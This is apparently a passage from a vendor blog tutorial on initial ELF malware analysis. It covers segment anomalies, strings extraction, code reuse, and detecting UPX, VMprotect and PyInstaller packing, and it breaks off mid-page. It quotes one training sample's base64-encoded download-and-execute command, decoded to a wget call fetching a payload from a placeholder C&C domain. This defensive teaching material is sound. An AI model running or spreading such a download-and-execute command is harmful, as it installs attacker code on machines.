<p><img loading="lazy" width="1020" height="254" class="aligncenter size-full wp-image-11694 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/8.png" alt="intezer" data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/8.png 1020w, https://www.intezer.com/wp-content/uploads/2020/08/8-300x75.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/8-768x191.png 768w" data-lazy-sizes="(max-width: 1020px) 100vw, 1020px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/8.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1020" height="254" class="aligncenter size-full wp-image-11694" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/8.png" alt="intezer" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/8.png 1020w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/8-300x75.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/8-768x191.png 768w " sizes="(max-width: 1020px) 100vw, 1020px" /></noscript></p>
<p>The table contains only 3 segments: 2 <strong>PT_LOAD</strong> segments and a <strong>PT_GNU_STACK</strong><strong>. </strong>The existence of <strong>PT_GNU_STACK</strong> indicates to the linker if the file needs an executable stack (this is also why its size is zero). This is not a typical structure for an ELF Program Headers table.</p>
<p><strong>Bottom Line</strong></p>
<ul>
<li>Segments:<br />
Anomalies in a file’s segment table can be:</p>
<ol style="color: #627d98;">
<li><strong>Segment types and count:</strong> The file contains only <strong>PT_LOAD</strong> segments (and <strong>PT_GNU_STACK</strong>).</li>
<li><strong>Flags:</strong> The file contains a segment that has all 3 flags (RWE). We will use these anomalies in the packers section.</li>
</ol>
</li>
<li>Sections: We will review examples of unique section names in the packers and interprets sections.</li>
</ul>
<p>Browse here for more information about <a href="https://www.intezer.com/blog/research/executable-linkable-format-101-part1-sections-segments/" target="_blank" rel="noopener noreferrer">ELF segments</a> and sections.</p>
<p><strong>Note: </strong><br />
Malware developers often strip or tamper with a file’s symbols and/or sections to make it more difficult for researchers to analyze the file. This makes it nearly impossible to debug the binary.</p>
<p>The following is a method a developer might use to strip a file’s symbols:</p>
<ol style="color: #627d98;">
<li>Run <strong>objcopy -S training-sample training-sample-stripped</strong></li>
<li>Run <strong>readelf -s training-sample-stripped</strong> and you will see there is only a dynamic symbol table.</li>
</ol>
<p>Strip utilities may also leave the sections and patch fields in the ELF header (<strong>e_shoff</strong>: offset of the section header table and <strong>e_shnum</strong>: the number of section headers). As a result, the binary will be detected as having no sections.</p>
<p><strong style="font-size: 20px;">ELF Header</strong><br />
The ELF header contains general data about the binary such as the binary’s entry point and the location of the program headers table. This information is not valuable during the initial file analysis but the file’s architecture can help us understand which machine the file is designed to run on, in case we want to run the file.</p>
<p>Let’s run <strong>readelf -h training-sample</strong> in order to view the sample’s header info:</p>
<p><img loading="lazy" width="924" height="363" class="aligncenter size-full wp-image-11695 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/9.png" alt="intezer" data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/9.png 924w, https://www.intezer.com/wp-content/uploads/2020/08/9-300x118.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/9-768x302.png 768w" data-lazy-sizes="(max-width: 924px) 100vw, 924px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/9.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="924" height="363" class="aligncenter size-full wp-image-11695" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/9.png" alt="intezer" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/9.png 924w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/9-300x118.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/9-768x302.png 768w " sizes="(max-width: 924px) 100vw, 924px" /></noscript></p>
<p>There are several advanced malware techniques that leverage the ELF header’s structure.</p>
<p>If you would like to learn more about this topic, watch <a href="https://www.youtube.com/watch?v=adYOSO0tn9M&amp;feature=emb_title" target="_blank" rel="noopener noreferrer nofollow">ELF Crafting</a> presented by Nacho Sanmillan at r2con.</p>
<p><strong style="font-size: 20px;">File’s Output</strong><br />
Simply running the file on your VM can always be useful. If the file presents an output, it might immediately help us to determine what it is.</p>
<p><u>Tip</u>: Before running the file make sure you have saved a clean snapshot of your VM.</p>
<p><strong style="font-size: 20px;">Strings</strong><br />
Strings extraction is a classic and powerful method for gathering information about a binary. Let’s run the strings command on our file and extract the strings into a txt file for convenience:<br />
<strong>strings training-sample &gt; str.txt</strong></p>
<p>When we review the strings, we will see declared chars from the code together with the symbols and other strings that are related to the file&#8217;s format, such as section names and the requested interpreter.</p>
<p>Like in PE analysis, we can search for indicative strings such as network related strings, encoded strings (such as base64 or hex), paths, commands, and other unique key words that might help us understand more about the file.</p>
<p>In the training file, the <strong>echo</strong> command string that contains the <strong>base64</strong> command string immediately stands out:</p>
<p><strong>echo d2dldCBodHRwOi8vc29tZW5vbmV4aXRpbmdjbmNbLl1jb20vbWFsd2FyZS5hcHA=|base64 -d |bash;</strong></p>
<p>If we decode the base64 string, we will receive the following command:</p>
<p><strong>wget http://somenonexitingcnc[.]com/malware.app</strong></p>
<p>We can assume the file drops a payload from a remote C&amp;C.</p>
<p><strong>String Reuse</strong><br />
<a href="https://analyze.intezer.com/" target="_blank" rel="noopener noreferrer nofollow">Intezer Analyze</a> is a useful tool for string extraction. It reduces analysis efforts by divulging whether certain strings have been seen before in other files. In the case of an unknown malware, filtering the common strings can help us focus our efforts on the file’s unique strings.</p>
<p><u>For example</u>:<br />
Lazarus’s <a href="https://analyze.intezer.com/files/0a7e7f99dd778cef86050d4ff436f209bd894ebb63faeb16ec0a92876ab81094" target="_blank" rel="noopener noreferrer nofollow">ManusCrypt</a> ELF version contains some of the same strings found in its PE version, which was previously reported by the U.S. government:</p>
<p><a href="https://analyze.intezer.com/files/0a7e7f99dd778cef86050d4ff436f209bd894ebb63faeb16ec0a92876ab81094" target="_blank" rel="noopener noreferrer nofollow"><img loading="lazy" class="aligncenter wp-image-11696 size-full jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/10.png" data-slb-group="post-images" alt="intezer" width="1323" height="509" data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/10.png 1323w, https://www.intezer.com/wp-content/uploads/2020/08/10-300x115.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/10-1024x394.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/10-768x295.png 768w" data-lazy-sizes="(max-width: 1323px) 100vw, 1323px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/10.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" class="aligncenter wp-image-11696 size-full" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/10.png" alt="intezer" width="1323" height="509" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/10.png 1323w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/10-300x115.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/10-1024x394.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/10-768x295.png 768w " sizes="(max-width: 1323px) 100vw, 1323px" /></noscript></a></p>
<p>You can easily browse the PE version to compare the two files using the related samples in Intezer Analyze:</p>
<p><a href="https://analyze.intezer.com/files/0a7e7f99dd778cef86050d4ff436f209bd894ebb63faeb16ec0a92876ab81094" target="_blank" rel="noopener noreferrer nofollow"><img loading="lazy" width="1076" height="341" class="aligncenter size-full wp-image-11714 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/11.png" data-slb-group="post-images" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/11.png 1076w, https://www.intezer.com/wp-content/uploads/2020/08/11-300x95.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/11-1024x325.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/11-768x243.png 768w" data-lazy-sizes="(max-width: 1076px) 100vw, 1076px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/11.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1076" height="341" class="aligncenter size-full wp-image-11714" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/11.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/11.png 1076w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/11-300x95.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/11-1024x325.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/11-768x243.png 768w " sizes="(max-width: 1076px) 100vw, 1076px" /></noscript></a></p>
<p><strong style="font-size: 20px;">Code Reuse</strong><br />
Examining code reuse in <a href="https://analyze.intezer.com/" target="_blank" rel="noopener noreferrer nofollow">Intezer Analyze</a> can be a great starting point for initial analysis. It can expedite analysis time by disclosing where certain code has been used before in other files.</p>
<p><u>For example</u>:<br />
This <a href="https://analyze.intezer.com/files/a8b069ef9d76cd42e873c6e8ded9db8c17d9d0ce234b5e7c9a126b4d514c6f72" target="_blank" rel="noopener noreferrer nofollow">Rekoobe sample</a> had 0 detections in VirusTotal. Upon upload to Intezer Analyze we receive a clear verdict (malicious) and classification (Rekoobe) based on code reuse to previous samples.</p>
<p><a href="https://analyze.intezer.com/files/a8b069ef9d76cd42e873c6e8ded9db8c17d9d0ce234b5e7c9a126b4d514c6f72" target="_blank" rel="noopener noreferrer nofollow"><img loading="lazy" width="1534" height="556" class="aligncenter size-full wp-image-11715 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/12.png" data-slb-group="post-images" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/12.png 1534w, https://www.intezer.com/wp-content/uploads/2020/08/12-300x109.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/12-1024x371.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/12-768x278.png 768w" data-lazy-sizes="(max-width: 1534px) 100vw, 1534px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/12.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1534" height="556" class="aligncenter size-full wp-image-11715" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/12.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/12.png 1534w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/12-300x109.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/12-1024x371.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/12-768x278.png 768w " sizes="(max-width: 1534px) 100vw, 1534px" /></noscript></a></p>
<p><strong style="font-size: 20px;">Packers</strong><br />
Unlike PE malware, where it’s common for known payloads to be packed with evasive and inconstant packers (polymorphic custom packers), this is rare in ELF malware. One explanation might be that the ongoing ‘cat-and-mouse’ game between security companies and malware developers is still in its infancy, as companies are starting to embrace Linux-focused detection and protection platforms for their systems.</p>
<p>However, the famous UPX is highly used by ELF malware developers. In this section we will review ELF packers, determine how we can identify if a file is packed, and understand what are our next steps if the file is indeed packed. We will focus on UPX and VMprotect, as they are the most commonly used packers.</p>
<p><a id="contentbanneranalyzemiddle" href="https://analyze.intezer.com/create-account?banner=contentbanneranalyzemiddle"><img loading="lazy" class="aligncenter wp-image-12309 size-full jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/09/AnalyzeA_750_80.png" data-slb-group="post-images" alt width="750" height="80" data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/09/AnalyzeA_750_80.png 750w, https://www.intezer.com/wp-content/uploads/2020/09/AnalyzeA_750_80-300x32.png 300w" data-lazy-sizes="(max-width: 750px) 100vw, 750px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/09/AnalyzeA_750_80.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" class="aligncenter wp-image-12309 size-full" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/09/AnalyzeA_750_80.png" alt="" width="750" height="80" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/09/AnalyzeA_750_80.png 750w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/09/AnalyzeA_750_80-300x32.png 300w " sizes="(max-width: 750px) 100vw, 750px" /></noscript></a></p>
<p><strong>Vanilla UPX</strong><br />
Files packed with Vanilla UPX are easy to detect and unpack.<br />
Let’s try it ourselves by packing the training file with UPX (<a href="https://github.com/intezer/ELF-Malware-Analysis-101/raw/master/Part-2-Initial-Analysis/Article-samples/training-sample-static-packed" target="_blank" rel="noopener noreferrer nofollow">you can download the compiled file form here</a>):</p>
<ol style="color: #627d98;">
<li>First, we must make the file larger by compiling it as a statically linked binary (UPX has a minimum file size and this file is currently too small).<strong>gcc -static training_sample.c -o training-sample-static</strong></li>
</ol>
<ol start="2">
<li style="color: #627d98;">Run: <strong>upx -9 training-sample-static -o training-sample-static-packed</strong></li>
</ol>
<p>Run <strong>readelf -a training-sample-static-packed</strong> to retrieve the file’s data. You will notice that there are only header and segments tables. These tables are necessary for the file to run.</p>
<p><img loading="lazy" width="1461" height="1199" class="aligncenter size-full wp-image-11716 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/13.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/13.png 1461w, https://www.intezer.com/wp-content/uploads/2020/08/13-300x246.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/13-1024x840.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/13-768x630.png 768w" data-lazy-sizes="(max-width: 1461px) 100vw, 1461px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/13.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1461" height="1199" class="aligncenter size-full wp-image-11716" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/13.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/13.png 1461w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/13-300x246.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/13-1024x840.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/13-768x630.png 768w " sizes="(max-width: 1461px) 100vw, 1461px" /></noscript></p>
<p>The segment table contains only <strong>PT_LOAD</strong> and <strong>PT_GNU_STACK</strong> segments. This is an anomaly in the segment tables structure that might indicate the file is packed.</p>
<p>Let’s run the strings command on the file. Notice that the majority of the strings are gibberish, however, we have an indication that the file is packed with UPX.</p>
<p><img loading="lazy" width="1057" height="172" class="aligncenter size-full wp-image-11717 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/14.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/14.png 1057w, https://www.intezer.com/wp-content/uploads/2020/08/14-300x49.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/14-1024x167.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/14-768x125.png 768w" data-lazy-sizes="(max-width: 1057px) 100vw, 1057px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/14.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1057" height="172" class="aligncenter size-full wp-image-11717" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/14.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/14.png 1057w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/14-300x49.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/14-1024x167.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/14-768x125.png 768w " sizes="(max-width: 1057px) 100vw, 1057px" /></noscript></p>
<p>The strings, together with the file’s table structure, indicates the file is probably packed with UPX.</p>
<p>Let’s use the <a href="http://ntinfo.biz/index.html" target="_blank" rel="noopener noreferrer nofollow">Detect It Easy</a> (DIE) tool. DIE is a signature-based tool that detects a file’s compiler, linker, packer, and more. Open the file with this tool and you will see it immediately identifies the file as UPX packed.</p>
<p><img loading="lazy" width="625" height="379" class="aligncenter size-full wp-image-11718 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/15.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/15.png 625w, https://www.intezer.com/wp-content/uploads/2020/08/15-300x182.png 300w" data-lazy-sizes="(max-width: 625px) 100vw, 625px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/15.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="625" height="379" class="aligncenter size-full wp-image-11718" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/15.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/15.png 625w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/15-300x182.png 300w " sizes="(max-width: 625px) 100vw, 625px" /></noscript></p>
<p>Now, let’s check out DIE’s <a href="https://reverseengineering.stackexchange.com/questions/21555/what-is-an-entropy-graph/21558" target="_blank" rel="noopener noreferrer nofollow">Entropy</a> feature:</p>
<p><img loading="lazy" width="725" height="480" class="aligncenter size-full wp-image-11719 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/16.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/16.png 725w, https://www.intezer.com/wp-content/uploads/2020/08/16-300x199.png 300w" data-lazy-sizes="(max-width: 725px) 100vw, 725px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/16.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="725" height="480" class="aligncenter size-full wp-image-11719" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/16.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/16.png 725w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/16-300x199.png 300w " sizes="(max-width: 725px) 100vw, 725px" /></noscript></p>
<p>If a file is packed with Vanilla UPX, unpack it by running<br />
<strong>upx -d training-sample-static-packed</strong> and then continue your analysis using the unpacked file.</p>
<p><strong>Custom UPX</strong><br />
Since UPX is open sourced, it’s easy to modify and add advanced layers to the packing process. In order to detect files that are packed with custom UPX, we can use the same detection methods used for Vanilla UPX. However, there might not always be an indicative string which can disclose that a file is probably packed with UPX. For example, <a href="https://www.fortinet.com/blog/threat-research/rocke-variant-ready-to-box-mining-challengers" target="_blank" rel="noopener noreferrer nofollow">Rocke</a> uses LSD! instead of the original UPX! header. Although it&#8217;s one of the most simple tricks in Custom UPX, it evades static parsers rather easily.</p>
<p><img loading="lazy" width="1063" height="201" class="aligncenter size-full wp-image-11720 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/17.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/17.png 1063w, https://www.intezer.com/wp-content/uploads/2020/08/17-300x57.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/17-1024x194.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/17-768x145.png 768w" data-lazy-sizes="(max-width: 1063px) 100vw, 1063px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/17.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1063" height="201" class="aligncenter size-full wp-image-11720" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/17.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/17.png 1063w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/17-300x57.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/17-1024x194.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/17-768x145.png 768w " sizes="(max-width: 1063px) 100vw, 1063px" /></noscript></p>
<p>Code reuse can also simplify packer detection. Check out this <a href="https://github.com/intezer/ELF-Malware-Analysis-101/raw/master/Part-2-Initial-Analysis/Article-samples/modified_upx_sample" target="_blank" rel="noopener noreferrer nofollow">modified UPX example</a>. It contains no string signatures but if we open it in <a href="https://analyze.intezer.com/files/3d1650fe601e705d4bb2c4d197eeb0fb56fba0479df98dbd159dcbd15ee12f7e" target="_blank" rel="noopener noreferrer nofollow">Intezer Analyze</a> it’s clear the file is packed with modified UPX.</p>
<p>Files packed with modified UPX will most likely not unpack with the <strong>upx -d</strong> command. In this case, we should proceed to dynamic analysis.</p>
<p><strong>VMprotect</strong><br />
VMprotect packer is a popular packing choice for PE files and it also has a packing solution for ELF files.</p>
<p>You can try it yourself by using the demo version. Execute the following commands to download VMprotect onto your VM and run it (<a href="https://github.com/intezer/ELF-Malware-Analysis-101/raw/master/Part-2-Initial-Analysis/Article-samples/training-sample.vmp.app" target="_blank" rel="noopener noreferrer nofollow">download the compiled file form here</a>):</p>
<p><strong>wget http://vmpsoft.com/files/VMProtectDemo_x64.tar.gz<br />
mkdir VMprotect<br />
tar -xf VMProtectDemo_x64.tar.gz -C VMprotect<br />
cp training-sample training-sample.app<br />
cd VMprotect<br />
./vmprotect_gui</strong></p>
<p>The VMprotect GUI should open. Choose “Open..” and then select “training-sample.app”.</p>
<p>Take a look at “VM Segment” in the “Options” setting. This “.vmp” field can be changed to any value the user decides. We will change it to “cat”. Next, click on the play button.</p>
<p><img loading="lazy" width="1269" height="573" class="aligncenter size-full wp-image-11721 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/18.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/18.png 1269w, https://www.intezer.com/wp-content/uploads/2020/08/18-300x135.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/18-1024x462.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/18-768x347.png 768w" data-lazy-sizes="(max-width: 1269px) 100vw, 1269px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/18.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1269" height="573" class="aligncenter size-full wp-image-11721" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/18.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/18.png 1269w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/18-300x135.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/18-1024x462.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/18-768x347.png 768w " sizes="(max-width: 1269px) 100vw, 1269px" /></noscript></p>
<p>The program has created a packed sample on your working directory. Run <strong>readelf -l training-sample.vmp.app</strong> to view the packed file’s segments.</p>
<p><img loading="lazy" width="1600" height="1125" class="aligncenter size-full wp-image-11722 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/19.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/19.png 1600w, https://www.intezer.com/wp-content/uploads/2020/08/19-300x211.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/19-1024x720.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/19-768x540.png 768w, https://www.intezer.com/wp-content/uploads/2020/08/19-1536x1080.png 1536w" data-lazy-sizes="(max-width: 1600px) 100vw, 1600px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/19.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1600" height="1125" class="aligncenter size-full wp-image-11722" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/19.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/19.png 1600w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/19-300x211.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/19-1024x720.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/19-768x540.png 768w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/19-1536x1080.png 1536w " sizes="(max-width: 1600px) 100vw, 1600px" /></noscript></p>
<p>Notice the file now has a <strong>PT_LOAD</strong> segment with RWE flags and the file’s entrypoint is inside this segment (the entrypoint address should be located somewhere between the segment’s virtual address and its memory size). You can see that the VMprotect section <strong>cat1</strong> is located inside this segment as well.</p>
<p>Run <strong>readelf -S training-sample.vmp.app</strong> to view the file’s sections.</p>
<p><img loading="lazy" width="948" height="149" class="aligncenter size-full wp-image-11723 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/20.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/20.png 948w, https://www.intezer.com/wp-content/uploads/2020/08/20-300x47.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/20-768x121.png 768w" data-lazy-sizes="(max-width: 948px) 100vw, 948px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/20.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="948" height="149" class="aligncenter size-full wp-image-11723" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/20.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/20.png 948w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/20-300x47.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/20-768x121.png 768w " sizes="(max-width: 948px) 100vw, 948px" /></noscript></p>
<p>VMprotect will create 2 new sections with the same name and suffixes of 1 and 0, respectively. The section names and the RWE segment combined with high entropy can disclose that a file is packed with VMprotect. If a file is packed with VMprotect, we should proceed to dynamic analysis.</p>
<p><u>Note</u>: If you review the symbols, you will see the functions and variables related to the payload no longer appear in the table. This makes sense considering the payload is packed and the file we are analyzing right now is the packer and not the payload.</p>
<p><strong style="font-size: 20px;">Other Packers</strong><br />
There are several open source projects for ELF packers. Here are some examples:<br />
<a href="https://github.com/ps2dev/ps2-packer" target="_blank" rel="noopener noreferrer nofollow">https://github.com/ps2dev/ps2-packer</a><br />
<a href="https://github.com/n4sm/m0dern_p4cker" target="_blank" rel="noopener noreferrer nofollow">https://github.com/n4sm/m0dern_p4cker</a><br />
<a href="https://github.com/timhsutw/elfuck" target="_blank" rel="noopener noreferrer nofollow">https://github.com/timhsutw/elfuck</a></p>
<p><strong>Bottom Line</strong><br />
We suspect a file is packed when it has:</p>
<ol style="color: #627d98;">
<li>Packer code reuse</li>
<li>High entropy</li>
<li>Segment anomalies</li>
<li>Large amounts of gibberish strings</li>
<li>Packer signature such as UPX strings and VMprotect sections names</li>
</ol>
<p>Next steps will be:</p>
<ol style="color: #627d98;">
<li>If there is an unpacking solution, we will unpack the file and analyze it.</li>
<li>If there isn’t an available unpacking solution, we will proceed to dynamic analysis.</li>
</ol>
<p><strong style="font-size: 20px;">Interpreters</strong><br />
Interpreters are programs that compile scripts to an executable. ELF files that were compiled with interpreters hold a compiled script within the binary. Interpreters can also be considered as “script obfuscators”, since the ELF file is just “wrapping” the clear-text source script.</p>
<p>Let’s review two commonly used interpreters:</p>
<ol style="color: #627d98;">
<li><a href="https://www.pyinstaller.org/" target="_blank" rel="noopener noreferrer nofollow">Pyinstaller</a>: Compiles python.</li>
<li><a href="https://github.com/neurobin/shc" target="_blank" rel="noopener noreferrer nofollow">shc</a>: Shell script compiler.</li>
</ol>
<p><strong>Pyinstaller</strong><br />
Files that were compiled with Pyinstaller will have the <strong>pydata</strong> section name. This is where the script’s pyc (compiled python source code) is placed in the ELF binary. Another way to detect Pynistaller binaries is via strings. The interpreter has unique strings such as “Error detected starting Python VM&#8221;. Take a look at this <a href="https://github.com/intezer/ELF-Malware-Analysis-101/blob/master/Part-2-Initial-Analysis/YARA/interpretes.yar" target="_blank" rel="noopener noreferrer nofollow">YARA rule</a>.</p>
<p><a href="https://analyze.intezer.com/files/06ad6831768fb9d04b5cbecce9753bab3be487992936eb82a00d8f77fb4b11bf" target="_blank" rel="noopener noreferrer nofollow">Code reuse</a> is also helpful for detecting Pyinstaller compiled files:</p>
<p><a href="https://analyze.intezer.com/files/06ad6831768fb9d04b5cbecce9753bab3be487992936eb82a00d8f77fb4b11bf" target="_blank" rel="noopener noreferrer nofollow"><img loading="lazy" width="1527" height="526" class="aligncenter size-full wp-image-11724 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/21.png" data-slb-group="post-images" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/21.png 1527w, https://www.intezer.com/wp-content/uploads/2020/08/21-300x103.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/21-1024x353.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/21-768x265.png 768w" data-lazy-sizes="(max-width: 1527px) 100vw, 1527px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/21.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1527" height="526" class="aligncenter size-full wp-image-11724" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/21.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/21.png 1527w , 